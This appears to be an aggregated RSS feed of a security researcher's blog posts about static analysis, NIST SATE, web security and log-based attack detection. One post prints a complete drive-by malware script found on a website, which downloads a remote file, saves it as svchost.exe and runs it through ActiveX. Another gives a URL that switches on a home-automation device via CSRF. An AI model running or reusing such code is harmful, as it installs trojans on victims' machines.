http://rgaucher.info/feed/rss2 I've been working on a data warehouse project lately, in python, to support different kind of data analysis I am developing as part of my current work. I decided to use SQLAlchemy as the ORM; I can then quickly move from my development version using SQLite database, to production, using MySQL or MSSQL databases. SQLAlchemy is also one of these amazing ORM that support sharding -- It's not necessary to tell that it's very important when you develop a tool that will import, format, process and analyze gigabytes of data. Also, working with a lot of data types, to register them into my ORM instance, and to persist them into a database, I need my software to be able to quickly generate an object representing the data type: a particular instance of the object. Developers usually create factories in order to create instances of objects. The main idea is to delegate the instantiation of the object to a third party object. In most factories, we specify a type of object that we want to create: Give me an instance of a pizza with mushroom, tomatoes and ham. The last point on asking for a particular type (or sub-type) of object was the main limitation for my use. In fact, most of my types are related in some ways, but without strong inheritance (Dish > Pie > Pizza); another important point is the maintainability of a code where I would list all different types of object my factory needs to create... Well, I wanted something more generic: a data driven factory. The data driven factory is a factory that, based on the data sent to the factory object constructor, will produce an instance. A simple example would be to be able to get an instance of a Margerita pizza when giving the certain ingredients (tomatoes, mozzarella and parmesan) or a Neapolitan if I add enchovies. This type of factory, which depends only on the data to give in parameter, is possible in python by using the class inspection capabilities of the language. In fact, the implementation I propose requires to register each class to be constructed in the factory, constructor arguments (and defaults arguments) will be analyzed for a matcher later on, and to give as arguments the "type" of each data field (basically, the arguments); the factory will then get the appropriate object for you. Side note: The fact that the factory doesn't return an instance of an object is for performances. In fact, I get the class from the factory, store it and loop through the instantiation with millions of data... Example of use: class Shape(object): pass class Circle(Shape): def init(self, center, radius=RAD_MAX): .... class DiskHole(Shape): def init(self, center, radius, small_radius=RAD_SMALL): .... factory = DDFactory() factory.register(Shape) factory.register(Circle) factory.register(DiskHole) print factory.get(['center', 'radius']) #> return 'Circle' ctor print factory.get(['center', 'radius', 'small_radius']) #> return 'DiskHole' ctor You can access this factory here: dd_factory.py In the distributed code, I assume that each object to create has a tablename class member that tells which database table is the eventual target (which is my case using SQLAlchemy / declarative objects). This is easy to change by replacing the factory register method by something like this: def register(self, cls): if hasattr(cls, 'init'): s_cls = str(cls) args, defaults_dict = DDFactory.defaults_values(cls) if s_cls not in self.registrar: self.registrar[s_cls] = {'class' : cls, 'args' : args, 'defaults' : defaults_dict}

==> NIST Static Analysis Tool Exposition special publication released

http://rgaucher.info/feed/rss2 "The NIST SAMATE project conducted the first Static Analysis Tool Exposition (SATE) in 2008 to advance research in static analysis tools that find security defects in source code. The main goals of SATE were to enable empirical research based on large test sets and to encourage improvement and speed adoption of tools. The exposition was planned to be an annual event." SATE 2008 was one of my last project at NIST. I really enjoyed working on this project from the beginning, it was challenging especially because we had to create so many artifacts to make the tool reporting the weaknesses the same way, integrate them all together and provide ways for assessors to make meaningful reviews. In a nutshell, we selected 6 different open-source programs (3 en C, 3 in Java) and made tool vendors running their tool on these test cases. Tool vendors were allowed to customize their tool if their tool provide such capability. Fortify was the only vendor who created a custom rule (to help the tool with a validation routine for MVNForum). Our goal was then to combine the results all together and analyze: provide information on the correctness of the tool. If you are interested, you can download the SATE data and the NIST SATE Special Publication. Thanks to all the SAMATE team for this effort, and especially Vadim Okun and Paul E. Black. For more information, you can reach the SATE page at NIST.

==> HTML 5 current browsers implementation support

http://rgaucher.info/feed/rss2 Firefox 3.1beta has been released today, with the support of two HTML 5: audio and video. Gareth and I exchanged some messages on twitter+ about the current support of HTML 5 by the different engines. The first document I found (well, asking on the #whatwg IRC chan) is the Comparison of layout engines you can find on Wikipedia; they also pointed me to a wiki that WhatWG maintains: Implementations in Web browsers. These are pretty incomplete documents and decided then, to create a mapping of the current WhatWG document and and the support of the browsers. This is possible because in the current document, they report the implementation status of the different items. Anyway, here is a table, I assembled, containing the last information about the HTML5 implementations in the current browser engines. I also want to say that even if the WASC Script Mapping project has looked quite inactive for some time now, I will definitely continue it. I'm actually waiting to finish a couple of other projects I participate to, especially the WASC Threat Classification 2 and the Web Application Security Scanner Evaluation Criteria. I expect to get started again to Script Mapping during this summer... EDIT: I will maintain the current list of HTML5 implementation in current browsers: HTML5. March 30. + twitter is quite cool to follow/interact, feel free to follow me at @rgaucher

==> SHA-3 reference implementations buffer overflows

http://rgaucher.info/feed/rss2 Fortify just posted a nice blog post about the audit they did on several reference implementation that compete for being the next NIST SHA-3. They do not release much information on their findings: only one is described. I would have really like to see how powerful was the analysis (if it was) to find these problems. It could be nice too to see other tool vendors, such as Grammatech, Klocwork, Coverity, etc. to do the same, and then, start another competition ;) I'd really like to emphasize the conclusions in the Fortify's blog post: Reference implementations don't disappear, they serve as a starting point for future implementations or are used directly. A bug in the RSA reference implementation was responsible for vulnerabilities in OpenSSL and two seperate SSH implementations. They can also be used to design hardware implementations, using buffer sizes to decide how much silicon should be used. The other consideration is speed, which will be a factor in the choice of algorithm. The fix for the MD6 buffer issues was to double the size of a buffer, which could degrade the performance. On the other hand, memory leaks could slow an implementation. A correct implementation is an accurate implementation.

==> When CAPTCHA fails...

http://rgaucher.info/feed/rss2 Some time ago, I was amazed by the difficulty of a CAPTCHA implemented by rapidshare. Well, today I came across one which is even worse. We all know that using a CAPTCHA is very bad on a usability point of view, but without them, spammers would easily add junk in your database. But it's even worse when the CAPTCHA software is not working properly... Sure you won't get any spammers here... nor regular users. Just to avoid confusion or misinterpretation, even if you refresh/clear cache/etc. you will get this message. And no, 'ERROR' is not the solution of the CAPTCHA. Hope that phishtank will fix that soon... We see many different CAPTCHA on the web, some are good, some not. I do not know why people keep developing their own simplistic CAPTCHA when there is a good services line the one provided by reCAPTCHA. This CAPTCHA is pretty solid and also adds audio version (way better for accessibility).

==> CIA spamming security groups: Be a part of a mission that’s larger than all of us.

http://rgaucher.info/feed/rss2 Hello Romain, The Central Intelligence Agency would like you to consider a career with the National Clandestine Service. The CIAs National Clandestine Service seeks qualified applicants to serve our countrys mission abroad. Our careers offer rewarding, fast-paced, and high impact challenges in intelligence collection on issues of critical importance to US national security. Applicants should possess a high degree of personal integrity, strong interpersonal skills, and good written and oral communication skills. We welcome applicants from various academic and professional backgrounds. Do you want to make a difference for your country? Are you ready for a challenge? All applicants for National Clandestine Service positions must successfully undergo several personal interviews, medical and psychological exams, aptitude testing, a polygraph interview, and a background investigation. Following entry on duty, candidates will undergo extensive training. US citizenship required. An equal opportunity employer and a drug-free work force. For more information and to apply, visit: www.cia.gov You can make a world of difference. Com'on guys, I'm not even US citizen... So yeah, CIA is looking for security guys by spamming on linkedin groups. Anything wrong in that process?

==> SSL Fails! SSLFail.com

http://rgaucher.info/feed/rss2 Marcin and Tyler just started a new website, which is kind of fun: sslfail.com (wall of shame of SSL certificates?) So now, Google & co, fix your certificates :P

==> Every-day's CSRF: Sorry, I turned off your christmas tree lights

http://rgaucher.info/feed/rss2 Today, a friend of mine was really proud to show me the Home Automation installation he just bought. Well, since he lives in France and I am in DC, he showed me the web interface that was able to control the lights etc. in his house. As he wanted to test this domotic system, he only plugged his Christmas tree lights on the system. Well, maybe I'm only seeing bad stuff around me, but... Dformation professionnelle we'll say! It was so easy to make it blinking with a simple script that I showed it to him. So well, every 5 seconds, it would change the state. Anyway, this CSRF is not a big deal for him since it's only the Christmas tree lights, it's only a temporary installation and well, it's fun. But after a simple google search, I found another site like my friend's. The URL that Google return is: http://XXX.XXX.XXX.XXX:88/control_exe.htm;3;1;ON Which is basically turning on some device... :) Also, not only this application has tons of CSRF, but also a nice stored XSS which let you do whatever you want with it! And btw, since the Google Robot reported this, it means that every time that it crawls the website (or at least, reaches that particular URL), it will set the device ON :) Web security enters your house, f34rs!

==> IE7, no Same Origin Policy when the script/file is on your file system

http://rgaucher.info/feed/rss2 It's been such a long time since I haven't posted here. I've been quite busy with the new job at Cigital and all the implication. Anyway, this morning, a collegue of mine show me a piece of javascript he used for create a request to another website (actually, this was just to do a javascript what I did in Python previously). This totally bugged me. He has been able to craft a request (using XHR) from a local file to a distant website... WTF with SOP? After some tests, it seems it's only working with IE7, but well, I didn't test with many browser, only with Firefox 3, Chrome, IE7. So, I have no idea if this is known for a long time or not, but well, I haven't seen this before. A simple POC is available here: xhr_SOP_ie7.html

==> Internet User Privacy Values Survey

http://rgaucher.info/feed/rss2 I know how tough and crucial it is to get participants to a survey, so that would be great if you guys could take this and spread it a little bit more... Researchers at ThePrivacyPlace.Org are conducting an online survey about privacy policies and user values. The survey is supported by an NSF ITR grant (National Science Foundation Information Technology Research) and was first offered in 2002. We are offering the survey again in 2008 to reveal how user values have changed over the intervening years. The survey results will help organizations ensure their website privacy practices are aligned with current consumer values. The URL is: http://theprivacyplace.org/currentsurvey We need to attract several thousand respondents, and would be most appreciative if you would consider helping us get the word out about the survey, which takes about 5 to 10 minutes to complete. The results will be made available via our project website (http://www.theprivacyplace.org/). Prizes include $100 Amazon.com gift certificates sponsored by Intel Co. and gifts from IBM and Blue Cross and Blue Shield of North Carolina On behalf of the research staff at ThePrivacyPlace.Org, thank you!

==> Last week at NIST

http://rgaucher.info/feed/rss2 Every good things have an end... this is the time for me to leave NIST. So I will be a security consultant at Cigital, Inc.. I've been working at NIST for 2 years and a half as a Guest Researcher in the SAMATE Project. I originally came at NIST to do mostly statistical analysis or so, but it changed a lot! I started by building the SAMATE Reference Dataset website and this is how I started to learn about "security", but working with flawed source code. This was very obscure to me (I guess like everybody computer scientist specialized in applied mathematics) and I learned a lot about weaknesses, vulnerabilities, "how to find them?", scanners etc. My first real security related work was about the Web Application Security Scanner Specification and then, design a way of testing the web apps scanners: * test suite with seeded vulnerabilities * checking the types of attacks * trying to explain the false-negative of the tools by a monitoring of what/where the scanner went in the application at a logical level, such as "did the tool logged in successfully? did it generate a couple of errors, did it try many times? The goal of the 3 components based analysis is to really be able to understand what the tool is doing, if it didn't find a particular vulnerability, why? One of the best moments I had at NIST was when we did the Static Analysis Tool Exposition. I was part of the organizers and from the beginning, it was a real challenge: choosing good test cases, criteria to evaluate the reports, etc. Of course, SATE 2008 was not perfect, we did many mistakes, but at least, we tried, we had some results and we learned a lot. I have good hopes for the next SATE, even though this is really challenging on many aspects: 1. Not make people think/act like this is a competition (we sometimes see people claiming they won SATE 2008, but... well, there would be many things to say to them) 2. Having a strong evaluation criteria (I guess this is challenging every time human assessment is part of the game) 3. Solve the way to present data to the evaluators. We couldn't have the GUI of the tools etc. so our analysis (as an evaluator) was really limited and we sometimes had to guess what was the exact weakness report 4. and finally, having more resources and help for evaluating the weaknesses reported by the tools (47k this year, one month to evaluate...) Oh well, I will of course continue to follow what the SAMATE team is doing, even though I will be away and busy with other interesting stuff and I'm really looking forward to see the results of the current study we are running on the function-wise weakness characterization. But for now, it's time for me to get some vacation, going back to France for almost one month, getting my worker visa etc.

==> Scalp 0.4: apache log based attack analyzer, updated

http://rgaucher.info/feed/rss2 Some time ago, I released a first version of a tool named Scalp. The tool analyzed the Apache HTTPD logs in order to examine if there were attacks or not. The attack detection is based on the rules provided by the PHP-IDS project. Today, I took time to finalize a bit more the Python version of Scalp. The version 0.4 can now be downloaded on the project web page. This version includes a couple of features such as: * Output in HTML, XML or TEXT format * Specify the output directory * Using a random sample for scanning the log file * Trying to decode the potential attack vectors * Returning the lines that couldn't be examined And then, with some other options that already existed in the previous versions, * Select a time frame * Select classes of potential attacks the tool seems to approach a final version. I won't add more into it since I want to keep it simple and quite fast (I may add optimization if I find some). Also, the C++ version is on its way and mostly done with same amount of options, the code is checkable using the google repository, but I still have to work on options and time-frame specification. Scalp 0.4: * HTML report example * Download the python script

==> PyQt and WebKit integration: unexpected limitation [fixed]

http://rgaucher.info/feed/rss2 For the one that don't know Qt, this is a huge and mature framework for developing GUI & more on different platform (to read, multi-platform). I already did some development using Qt and C++ (especially when I was working at the GERAD). As, with Marcin, we wanted to have a look at some technologies that involved a browser etc. I decided to look at Qt and the almost-fresh WebKit integration. The integration of WebKit in a framework like Qt, allows the developer to embed supposedly in a easy manner a browser that supports the basic web technologies which are HTML, CSS and JavaScript (it seems that Flash is going to be supported soon, and anyway, one can write its own plugin in order to interact with some specific content) in its application. And indeed it is easy... I used PyQt in order to develop a very simple prototype and see what we are able to do with this new technology. As I know already Python and Qt, it was easy to me to start and be kinda effective. So, in few hours of work, documentation reading and trying to understand why and how the Python version of Qt was using such or such thing compared to the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, view the source and a simple encoding converter (click on the image to see the full screen-shot): At this point, I was actually very excited, less than 500 lines of Python in order to create that... was kinda worth few days of work in order to create a useful tool: the Swiss Army Knife of the Pen-Test. My next and logic step was to extend the current tool in order to have the tamper-data like capabilities (eg. being able to hijack the HTTP request and then tampering the GET/POST data). And here come the problems... it's apparently not possible to get the current request then reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to overload the POST/GET request since this object is use to set the proxies etc. but nothing... I think they just didn't open this possibility for some reason. Oh well, I then stop developing this prototype and will try to contact Qt experts/developers just to figure out if there is no other way to do it. I thought of a solution which would be to have my own HTTP manager using QHttp in order to do the request, get the response etc. and then sending the content to the browser; this would be great in a webapps scanner, but for the use that I wanted with, that would create huge limitation for the user-interaction and especially for Ajax applications. So, the prototype stays here until I find a solution or Qt open their network management under the QWebView widget... Fixed: An update to let you know that I actually fixed the problem, it was really stupid from me, but I should really care when the method are virtual or not before overloading it or not :/ shame on me! So now, I am able to have a firefox/tamper-data/firebug in one tool :)

==> And so you wanted to protect your email address on your website...

http://rgaucher.info/feed/rss2 People start thinking of how to prevent spam when they're building website, that's a fact and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page... For instance, I was surfing on qik.com and saw this little piece of JavaScript in order to protect the exposure of the email address: <script type="text/javascript"> //<![CDATA[ document.write('<a href="mailto:XXXX@qik.com"\ title="Send us an email!">XXXX@qik.com<\/a>'); //]]> </script> As the readers of this blog may know, the bot process is really easy.... download the HTML page (crawling) and then trying to extract the email address (parsing). This is just obvious that a bot wouldn't bother with the CDATA tag or because this is embedded in a JavaScript code, if I would have to do a bot, nonetheless I would have a very lossy parsing in order to gather as much information as possible, but I wouldn't care about "in which context am I?". Also, according to some testing I'm doing, I can tell you have if this was a URL, the Google bots would get them... So please, obfuscate just a bit this... some example can be found on fuckthespam.com

==> Why the "line of code" is indeed a good metric

http://rgaucher.info/feed/rss2 When I first learned about source code metrics, I was amazed about people using the line of code for doing comparison with software. It was for me a lack of imagination. At the beginning of the week, I started a small and fast experiment: extracting metrics from the SATE 2008 test cases. This experiment focuses on function-wise properties and therefore, I have to extract for each functions a couple of metrics: * McCabe's cyclomatic complexity which computes the code complexity, this is indeed a good metric to estimate the difficulty that a human will have to understand a given piece of code (very important for security related problems) * Line of Code * Line of Comments * Number of local variables * Number of parameters (which represents the coercion between the function and the whole program) * Number of function call * Number of function that are ``sources'' * Number of function that are ``sinks'' * Number of C standards functions (obviously, only for C test cases) At first the the line of code was implemented cause it's an easy one to compute and it also gives an important value if we want to normalize the other metrics. We also decided to introduce the number of ``source/sinks'' for studying input validation weaknesses later on... Anyway, after running some statistics on the output results, I was amazed by observing that the Pearson correlation coefficient between McCabe and Line of Code was never less than 0.90 (which could be compare to 90% as a correlation rate) (but I have to say that there is huge limitations in the parsers we are using for extracting information, for instance, the C is not pre-processed etc.). This result is only valid for C test cases, actually, the average of observed correlation in Java test case is around 0.60... Of course further statistical analysis will be necessary to conclude anything on this subject, but if we were unlucky with the test cases selection, this may have been a source of the problem, but I don't think we were. Actually, this seems quite logical to think that these metrics a related, the longer the code is, the more complex in term of tests, loops etc. it can be, there is indeed more chance that a longer code contains more cycles :) Oh well, I'll keep writing about especially since I expect to get results pretty soon...

==> Trie based fast and massive replacement (Algorithm)

http://rgaucher.info/feed/rss2 While working on the C++ version of scalp, I had to do massive simple transformations of a given text, ie. replacements of words by others. Since the main way to do this (a loop which does a replacement at the time), is very inefficient, I decided to find something faster. I then came up with a tree based replacement algorithm; I believe this is kinda famous but I never heard about such algorithm, it basically uses a non compact trie in order to have an efficient search of the current word. The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to to replace the words: "ba", "me", "mp" in a text, the trie will be this following one: The idea is then to iterate over all the characters in the text, and for each letter determines whether this is a possible word to replace or not (simply by looking if the letter is a bleep of the trie root). Then, we iterate over the next letters in the text in order to see if the sequence of letters are an actual word to replace or not (every time, the same methodology is used: look in the bleep at the current state of our iterator in the trie). This algorithm seems more efficient than the simple replace used in a loop since we will perform a descent in a tree and therefore replace a linear search by a logarithm one. I ran a little statistical comparison between two algorithms: mine and the simple loop one. The test bed is quite simple and uses randomly generated text which contains the words to replace with a certain density. In order to create statistics, I made all the sizes varying and I aggregated the results from the same dictionary size. So, for a given size of a dictionary (let's say, 200 words to replace), a text has been generated with a density that vary from 0.1 to 0.5 (from 10% to 50% of the words in the text will be words to replace) and finally, the size of the text vary from 25 to 200 words (and words are randomly generated to be from a size 5 to 32). As I said previously, the results from a same dictionary size has been aggregated since I've seen practically that the result mainly depends on the dictionnary size (it also obviously depends on the size of the text, but as this is a constant for the 2 algorithm, I can compute the mean of the different data to extract the average gain for a particular dictionary size). Finally, here is the curve that shows the logarithm progress of the gain compared to the classical method): The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation): void str_replace(string& where, const string& what, const string& by) { for (string::size_type i = where.find(what); i != string::npos; i = where.find(what, i + by.size())) where.replace(i, what.size(), by); } and has been used M times (M is the size of the dictionary). I also decided to release a very-early version of this replace algorithm (which is not template yet): stree.h which use the great STL friendly tree structure from Kasper Peeters. As for data information, the here is the code I used to generate the

==> A morning at work: Content-Disposition blocked!

http://rgaucher.info/feed/rss2 A morning, I woke up, and all the websites using a download system didn't work anymore. Yeah this is what I've seen. I guess I don't need to tell you that it was such a pain and that all the downloading systems on the different websites we have were not working anymore. Such a big stress thinking that everything is broken at first, then after some time, realized that the problem is about the Content-Disposition header field which is dropped. I wouldn't say that I would like to thank the admin that do no tell people about the modification... Anyway, I guess this is every time like that? The Content-Disposition HTTP header field is used to explain to the browser how the data are presented. I basically use it in order to force a download system using such php script: <?php // download.php // some checks on the $fname, variable to be sure // it exists and is in the allowed directories... header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, pre-check=0"); header("Content-Type: application/octet-stream"); header("Content-Length: " . filesize($fname)); header("Content-Disposition: attachment; filename=".basename($fname)); header("Content-Description: File Transfer"); @readfile($fname); exit; ?> Now, if you cannot submit the Content-Disposition field, then the browser will download the file called "download.php". A quite simple solution, is to fool the browser by making the name of the reachable URI the same as the file it should download, using Mod_Rewrite. RewriteEngine On RewriteBase /mydir RewriteRule ^download/([^/]+)$ /mydir/download.php?file_redir=$1 And just a simple modification in the original script in order to detect the "file" GET variable. But since we don't want to modify all the (generated or not) HTML files, we need to make the redirection automatically. <?php // download.php // some checks on the $fname, variable to be sure // it exists and is in the allowed directories... if (isset($_GET['file_redir'])) { $fname = $_GET['file_redir']; // checks for good files (careful of directory traversal etc.) header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, pre-check=0"); header("Content-Type: application/octet-stream"); header("Content-Length: " . filesize($fname)); header("Content-Description: File Transfer"); @readfile($fname); exit; } else { header("Location: /mydir/download/$fname"); exit; } ?> Then you don't have to change all your pages. This is of course a (not so?) temporary solution since the server will do extra work in order to go to the same state, the download of the file, but well, it does the job to fool the browser...

==> Scalp: apache log based attack analyzer

http://rgaucher.info/feed/rss2 I started a project some time ago in order to parse some apache log file, to detect some attacks etc. The attack recognition is based on the PHP-IDS filters. The first release version is written in Python http://code.google.com/p/apache-scalp/downloads/list but I started (well, almost finished) a faster multi-threaded/C++ version in order to be able to handle bigger log files. The main project page is reachable here: http://code.google.com/p/apache-scalp Scalp the apache log! - http://code.google.com/p/apache-scalp usage: ./scalp.py --log|-l --filters|-f --period [OPTIONS] --attack --log |-l: the apache log file './access_log' by default --filters |-f: the filter file './default_filter.xml' by default --exhaustive|-e: will report all type of attacks detected and not stop at the first found --period |-p: the period must be specified in the same format as in the Apache logs using * as wild-card ex: 04/Apr/2008:15:45;*/Mai/2008 if not specified at the end, the max or min are taken --html |-h: generate an HTML output --xml |-x: generate an XML output --text |-t: generate a simple text output (default) --except |-c: generate a file that contains the non examined logs due to the main regular expression; ill-formed Apache log etc. --attack |-a: specify the list of attacks to look for list: xss, sqli, csrf, dos, dt, spam, id, ref, lfi the list of attacks should not contains spaces and be comma separated ex: xss,sqli,lfi,ref

==> My talk at SAW: Automated Evaluation of source code analyzer output

http://rgaucher.info/feed/rss2 It has been some time since I haven't post on my blog... well, I've been busy especially with the end of SATE, and oh well! had vacation :) Anyway, at the next Static Analysis Workshop this Thursday, we're gonna talk about the SATE experiment and the observations/results we could get from this. I am then gonna talk about a tool I wrote in order to probe if a reported weakness is a false-positive: this is the Automated Evaluation. The main idea of the Automated Evaluation, is to get some information on the source code and, under some assumptions, try to make a conclusion on the correctness of the piece of code. Behind all the reasoning from that particular tool, my approach had to be radically different than a classical SCA otherwise this would have been like creating a new SCA and this would have been obviously useless. The context of this automated evaluation is limited to the buffer overflows and this can only work for proving false-positive only! So basically, I am reading the source code from the reported sink to the possibles sources and grabbing the actions that possibly affect the variable which have a role in the code. These actions are like: * Allocation of a destination buffer * Computing the size of the source buffer(s) * Test for NULL * Test that involves the size of the buffers... * ... and some others Then, once these actions are detected, the tool increments a global score of false-positiveness to this reported weakness. We then only have to set a threshold in order to know what correctness we want to have; this is really tied to the source code and how the program is developed. Even though this evaluation method is not perfect, this was adapted to the C test cases we had in SATE 2008 since the global code quality was good. We can even say that the software were well written; it was then okay to make some assumption on the code such as: * If the size of the destination buffer is computed with the size of the source buffer, the size is good (basically: no off-by-one) Also, the tool itself needs some information on the source code such since it uses regular expression to match the "actions"... Here we are for a quick explanation and here are the slides: SAW: Automated Evaluation of SCA output

==> ph34r the script kiddies: Whitehouse.org

http://rgaucher.info/feed/rss2 I was just reading this news (reported by Kanedaa), decided to look closer to the content of this "malware" stuff to see if there was some nice techniques behind this so called "attack". Oh men! How disappointing to see that this was done by script kiddies... the "obfuscation" consist of 3 levels of URL encoded javascript... yeah... URL encoding is for sure an obfuscation very hard to prettify. And the final code was just not obfuscated either... Just this: function myCreateOB(o, n) { var r = null; try { eval('r = o.CreateObject(n)') }catch(e){} if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} } if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}} if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}} if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}} if (! r) {try { eval('r = o.GetObject(n)') }catch(e){} } return(r); } function Go(a) { var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll"); var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am"); var e = s.Environment("Process"); var xml = null; var url = 'http://ad.ox88.info/bbs.jpg'; var bin = e.Item("TEMP") + "svchost.exe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); } catch(e) { xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP"); } } if (! xml) return(0); xml.open("GET", url, false) xml.send(null); dat = xml.responseBody; o.Type = 1; o.Mode = 3; o.Open(); o.Write(dat); o.SaveToFile(bin, 2); s.Run(bin,0); } function mywoewd() { var i = 0; var ss11='{7F5B7F'; var ss12='63-F06'; var ss13='F-4331-8A'; var ss14='26-339E0' var ss15='3C0AE3D}'; var ss1=ss11+ss12+ss13+ss14+ss15 var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}"; var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}"; var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}"; var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}"; var t = new Array(ss1,ss2,ss3,ss4,ss5,null); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a = document.createElement("object"); a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); } else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell"); if (b) { Go(a); return(0); } } catch(e){} } i++; } } As reported by Trend Micro, this is supposed to be a download of the trojan: TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't detect it :)

==> Yet another study on code quality: A Tale of Four Kernels

http://rgaucher.info/feed/rss2 If like me you are interested in code quality and some general conclusion that one can draw based on code quality studies, I really recommend to read this paper: A Tale of Four Kernels by Diomidis Spinellis, ICSE '08: Proceedings of the 30th International Conference on Software Engineering I just want to quote a part of the conclusion by the author Therefore, the most we can read from the overall balance of marks is that open source development approaches do not produce software of markedly higher quality than proprietary software development. The only problem with this statement is that it is based on the fact that the metrics he used were not weighted for their importance for the "Code Quality" (if this means something). Therefore, the comparison between the Windows research kernel and Linux seems a little bit awkward to me. Anyway, this is a very interesting paper about code quality, and lots of interesting ideas from the author of CScout.

==> Static Analysis Tool Exposition is over

http://rgaucher.info/feed/rss2 Yeah, that's sad and also a relief: SATE is over. We actually released today the last stage of the evaluation (basically, the evaluation with some correction based on comments from the participants). Even though I would have prefer to have more feedback from participants on our evaluation, especially to increase its quality, I still think SATE is a good thing and will be an interesting resource for lost of researchers. This is, as far as I know, the only exhaustive resource on the subject (wild source code + weaknesses). What do I want to do, see next? Since we have accumulated lots of data with the tool reports (raw weaknesses), the evaluations (I really want to thank MITRE's guys, especially Steve Christey and Bob Schmeichel for their help), I'm looking forward to do data analysis and trying to extract some limited results on it. Anyway, this was overall a good experience, I actually did my first real code review mostly on lighttpd, dspace, mvnform and naim, I think I know way more on how detecting vulnerabilities, I also have been asking myself about how to rate vulnerabilities such as Cross-Site Scripting (hopefully, I will release the little document I wrote about it), I learned so much about how people are writing code trying to understand the design, the code etc. in the applications. Also, hopefully, I will be able to release the website I developed to handle the weaknesses from different tools. It is, I think, interesting if you are working with more than one assessor. You can send evaluation, comments, merging the weaknesses etc. with a web interface. Even though it needs improvements (it has been done in less than 2 weeks) I think this would be an interesting piece of software for people who are dealing with tons of weaknesses. Another interesting point is that we (at NIST) may open that website for everybody in order to make new evaluation in order to increase the quality of the data we currently have. Oh well, it seems like a journey is really close to its end, it was such a good time sometimes, and some other time such consuming work. We've been dealing with fifty thousands of weaknesses, dozen of tool reports, and almost tens of test cases... I will keep you posted about the next decision we are gonna make with SATE and hope that lots of people will find in this "exposition" the most they could get.

==> Oh please stop it with these ridiculous CAPTCHAs!

http://rgaucher.info/feed/rss2 Marcin just told me about that stupid CAPTCHA from the rapidshare website. Even if I think this is made explicitly to annoy people (this CAPTCHA is used only for free accounts) this is just stupid. Can you really tell which letter has cat or not? I'm sorry but I can't!

==> Accelerate the convergence to the bug: Running the test in 16-bit

http://rgaucher.info/feed/rss2 Yesterday, I came across a case in a piece of software which was really hard for me to understand perfectly. Not only the code is well written (which is always worse for finding bugs :)) but the structure is also well thought (this is the implementation of an associated array in C in the lighttpd application). The problem I had was to state whether a tool report was a true-positive/false-positive. So, as in many case I've seen in this software a problem may occur only in the limit cases. This one may occur after INT_MAX insertion in the structure. I don't know if one of you ever tried to do such a thing, but only INT_MAX (~2 billions on typical PC) allocations is a lot, so inserting elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. Also, I ran this test with valgrind using the memory leak check (full check and high definition). I then ran a simple test program to fill this structure in a real condition: a typical x86/32-bit architecture. As I knew it was stupid and didn't even think this could end before 2 days I started looking in other direction in order to reduce the INT_MAX size for having a reasonable time execution of the test. My first attempt is to shift all the types that are used, I knew this was not perfect because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers, a char * would still b 32-bit (there may be some options in gcc to control the size of the pointers which I doubt but I didn't find any). Using this methodology, I was able to make the program crash in the way that would have been a real true-positive. But as I knew it was not good since the size of the pointers are not modified and I had the feeling that in that particular structure, the case of the possible crash is handled by itself (due to pointer and type limits), I started looking in other direction for running that program in 16-bit, a pseudo-real-16-bit-mode. I then started looking into emulators and how to compile code for 16-bits and running it on my linux (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with ELKS utilities, the test program didn't crash, it only failed in an assertion test after an allocation... Different behavior, with different methods, okay... which is the correct one? Is it a problem of pointer size that made the test running differently than the real program on a 32-bit or maybe a limitation of the elksemu machine? As this morning I checked the state of the 32-bit run I launched yesterday, and this was finished... ended by a failed assertion. As expected, pointer size matters when you wanna test on intrinsic limitations of a structure and its behavior using limit cases.

==> Scaling MySQL db

http://rgaucher.info/feed/rss2 I've just came across this interesting blog entry; some numbers on how people (large websites companies) are actually using MySQL. http://venublog.com/2008/04/16/notes-from-scaling-mysql-up-or-out/

==> Cybergang plans to use Trojan against U.S. banks

http://rss.techtarget.com/981.xml A cybergang in Eastern Europe revealed plans to attack U.S. banks with a Gozi-like Trojan, according to RSA. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Improved Shylock Trojan targets banking users

http://rss.techtarget.com/981.xml The latest variant of the banking Trojan is causing numerous problems, Symantec said. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Tilon financial malware targets banks via MitB attack, Trusteer finds

http://rss.techtarget.com/981.xml Tilon is related to the Silon malware detected in 2009. It uses a man-in-the-browser attack to capture form submissions and steal credentials. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Citadel malware toolkit going underground, says RSA

http://rss.techtarget.com/981.xml The Citadel crimeware, a toolkit giving cybercriminals sophisticated financial malware, is being taken off the market by its authors, according to experts monitoring its activity. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Tinba banking Trojan sniffs network traffic, steals data

